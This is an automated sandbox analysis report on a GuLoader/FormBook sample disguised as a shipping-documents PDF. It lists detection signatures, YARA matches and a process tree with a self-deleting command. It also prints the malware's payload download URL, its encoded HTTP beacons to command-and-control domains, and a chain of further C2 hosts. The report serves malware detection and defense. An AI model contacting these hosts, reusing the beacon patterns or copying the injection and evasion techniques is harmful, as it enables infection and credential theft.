
Analysis Report Shipping Documents (INV,PL,BL)_pdf.exe

Overview

General Information

Sample Name: Shipping Documents (INV,PL,BL)_pdf.exe
Analysis ID: 320999
MD5: aed402d9a5675f5796265e5170ada7cb
SHA1: d2e2087f83c1ef3d10cbe60acb721745d19306b3
SHA256: 44350179d4fdd08fd02c02b733f80c82d54f5af31c8a2432de9cfb6b11ab4aa0
Tags: DHL, exe, GuLoader


Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 2540 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
    • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 5268 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x5368:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183e9:$sqlite3step: 68 34 1C 7B E1
  • 0x184fc:$sqlite3step: 68 34 1C 7B E1
  • 0x18418:$sqlite3text: 68 38 2A 90 C5
  • 0x1853d:$sqlite3text: 68 38 2A 90 C5
  • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://lifeandhealth.com.mx/) | Avira URL Cloud: Label: malware
Source: https://lifeandhealth.com.mx/x | Avira URL Cloud: Label: malware
Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bind | Avira URL Cloud: Label: malware
Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Shipping Documents (INV,PL,BL)_pdf.exe | Virustotal: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi
Source: global traffic | HTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1 | Host: www.drinksandfruits.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1 | Host: www.iatlet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: NETSOURCEUS NETSOURCEUS
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Windows\explorer.exe | Code function: 3_2_061F5782 getaddrinfo,setsockopt,recv,
Source: global traffic | HTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1 | Host: www.drinksandfruits.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1 | Host: www.iatlet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: lifeandhealth.com.mx
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 20 Nov 2020 07:55:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://cert.i
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: explorer.exe, 00000003.00000000.297520534.000000000F6D4000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.84streetchamber.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.84streetchamber.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.84streetchamber.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.cannahavedessert.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.cannahavedessert.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.cannahavedessert.com/icm9/www.kalcio.site
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.cannahavedessert.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.drinksandfruits.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.drinksandfruits.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.drinksandfruits.com/icm9/www.iatlet.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.drinksandfruits.comReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.faithinfitness.net
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.faithinfitness.net/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.faithinfitness.net/icm9/www.hunexhq.icu
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.faithinfitness.netReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.frontierautoglasswheatfield.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/M
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.frontierautoglasswheatfield.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.gcsisgreen.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.gcsisgreen.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.gcsisgreen.com/icm9/www.smartbulk.store
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.gcsisgreen.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.hunexhq.icu
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.hunexhq.icu/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.hunexhq.icu/icm9/www.frontierautoglasswheatfield.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.hunexhq.icuReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.iatlet.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.iatlet.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.iatlet.com/icm9/www.leepl.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.iatlet.comReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.images77.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.images77.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.images77.com/icm9/www.gcsisgreen.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.images77.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kalcio.site
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kalcio.site/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kalcio.site/icm9/www.mademoisellepierre.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.kalcio.siteReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.leepl.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.leepl.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.leepl.com/icm9/www.nationalcanopies.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.leepl.comReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.machevate.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.machevate.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.machevate.com/icm9/www.84streetchamber.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.machevate.comReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.mademoisellepierre.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.mademoisellepierre.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.mademoisellepierre.com/icm9/www.images77.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.mademoisellepierre.comReferer:
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.nationalcanopies.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.nationalcanopies.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.nationalcanopies.com/icm9/www.cannahavedessert.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.nationalcanopies.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.smartbulk.store
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.smartbulk.store/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.smartbulk.store/icm9/www.machevate.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.smartbulk.storeReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.verifyinstagram-help.com
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.verifyinstagram-help.com/icm9/
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net
Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmp | String found in binary or memory: http://www.verifyinstagram-help.comReferer:
Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: https://lifeandhealth.com.mx/)
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bind
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmp | String found in binary or memory: https://lifeandhealth.com.mx/x
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241695926.00000000006BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Shipping Documents (INV,PL,BL)_pdf.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Shipping Documents (INV,PL,BL)_pdf.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F7FAA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F97D3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F086A EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F91CF NtProtectVirtualMemory,
